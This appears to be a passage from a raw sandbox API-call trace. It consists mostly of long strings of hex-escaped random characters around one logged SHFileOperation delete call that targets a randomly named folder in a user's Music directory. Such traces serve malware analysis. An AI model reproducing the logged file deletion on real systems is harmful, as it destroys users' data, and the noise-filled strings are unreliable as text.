174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d9